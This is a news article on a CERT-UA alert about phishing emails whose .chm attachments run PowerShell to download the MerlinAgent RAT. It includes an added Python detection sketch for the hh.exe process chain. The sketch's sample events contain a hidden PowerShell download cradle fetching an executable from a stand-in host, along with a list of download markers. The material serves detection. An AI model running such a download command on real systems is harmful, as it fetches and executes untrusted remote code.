Kyiv Cyber Defenders Spot Open-Source RAT in Phishing Emails
Threat Actor Coaxes Users Into Downloading MerlinAgent

Hackers attempting to spy on the Ukrainian government are using an open-source remote access Trojan, said Kyiv cyber defenders.
The Computer Emergency Response Team of Ukraine said in a Saturday alert that a threat actor it tracks as UAC-0154 had impersonated CERT-UA itself in phishing emails with the subject line "CERT-UA recommendations on MS Office program settings."
The phishing emails carry a .chm attachment: a Compiled HTML Help file, a compressed, proprietary Microsoft format primarily used for software documentation. When the recipient opens it, JavaScript embedded in the file runs a PowerShell script that downloads the MerlinAgent executable, the open-source RAT. Because Windows Help files can carry active script, a .chm attachment from an unexpected sender deserves the same scrutiny as a macro-enabled Office document.
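As an added example (not code from CERT-UA, this article or the Merlin project), here is a detection sketch in Python for the chain described above. It walks process-creation telemetry, finds every process spawned beneath hh.exe (the Windows HTML Help viewer that opens .chm files, an assumption not stated in the alert), and flags script hosts such as PowerShell or cmd.exe among those descendants, raising the severity when the command line shows a download. The Sysmon-style field names (pid, ppid, image, cmd), the marker list and all of the sample events are constructed for the example.

```python
"""Flag script hosts launched under hh.exe (CHM -> JS -> PowerShell chain).

Added example, not CERT-UA, ISMG or Merlin code. Assumes .chm files open in
hh.exe and that process-creation telemetry (Sysmon Event ID 1 style) supplies
pid, ppid, image and command line. All events below are constructed.
"""
import ntpath
from collections import defaultdict

# Interpreters and LOLBins a CHM's embedded script typically hands off to.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

# Substrings that suggest a download or an obfuscated command line (assumed list).
DOWNLOAD_MARKERS = (
    "downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
    "net.webclient", "start-bitstransfer", "-encodedcommand", "-enc ",
    "http://", "https://",
)

# Constructed process tree: one malicious chain and two benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # user opens the attachment: explorer -> hh.exe
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\hh.exe",
     "cmd": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\recommendations.chm'},
    # script in the CHM starts cmd.exe, which starts PowerShell
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c powershell -w hidden -nop -c "..."'},
    {"pid": 301, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -nop -c \"(New-Object Net.WebClient)."
            "DownloadFile('http://example.invalid/a.exe','C:\\Users\\u\\a.exe')\""},
    # benign: hh.exe reading product documentation, spawns nothing
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\hh.exe",
     "cmd": r'"C:\Windows\hh.exe" C:\Program Files\Tool\manual.chm'},
    # benign: PowerShell started from Explorer, not under hh.exe
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Get-Process"},
]


def basename(image):
    """Lower-cased file name of a Windows image path, on any host OS."""
    return ntpath.basename(image).lower()


def detect_chm_chain(events):
    """Return one alert per script host found anywhere beneath an hh.exe process."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])

    alerts = []
    for root in events:
        if basename(root["image"]) != "hh.exe":
            continue
        # Depth-first walk so grandchildren (hh.exe -> cmd -> powershell) are caught.
        stack = list(children[root["pid"]])
        while stack:
            pid = stack.pop()
            stack.extend(children[pid])
            proc = by_pid[pid]
            name = basename(proc["image"])
            if name not in SCRIPT_HOSTS:
                continue
            lowered = proc["cmd"].lower()
            downloads = any(m in lowered for m in DOWNLOAD_MARKERS)
            alerts.append({
                "chm_pid": root["pid"], "chm_cmd": root["cmd"],
                "pid": pid, "image": name,
                "severity": "high" if downloads else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_chm_chain(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] pid {alert['pid']} ({alert['image']}) "
              f"under hh.exe pid {alert['chm_pid']}: {alert['chm_cmd']}")
```

Run against the sample tree this reports cmd.exe (medium) and the PowerShell download (high) under the hh.exe that opened recommendations.chm, and nothing for the documentation viewer or the admin's PowerShell session. Walking descendants rather than only direct children matters because the CHM's script often hands off through cmd.exe first; in production the lookup would be keyed on process GUIDs rather than reused PIDs.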
Close observers of the conflict in Ukraine sparked by Russia's February 2022 invasion of its European neighbor have said Kremlin hackers are primarily focused on espionage. Ukraine is currently weeks into a counteroffensive against Russian positions in its eastern provinces (see: Russian Hackers Focused on Espionage, Not System Destruction).
MerlinAgent, available on GitHub, is a project developed by penetration tester Russel Van Tuyl, who said he wrote it after completing a SANS Institute dissertation on web application attacks over the HTTP/2 protocol.
Van Tuyl wrote Merlin in Go. "This means we can use a single code base and put agents on most any machine we encounter, having them all call back to whatever platform we decide to run the listening post (vs. only being able to put agents on Windows, or only being able to run listening posts on Linux)," a security blogger using the name Action Dan wrote in 2018.
Merlin's advanced logging features are useful for capturing details after an operation has concluded, the blogger said.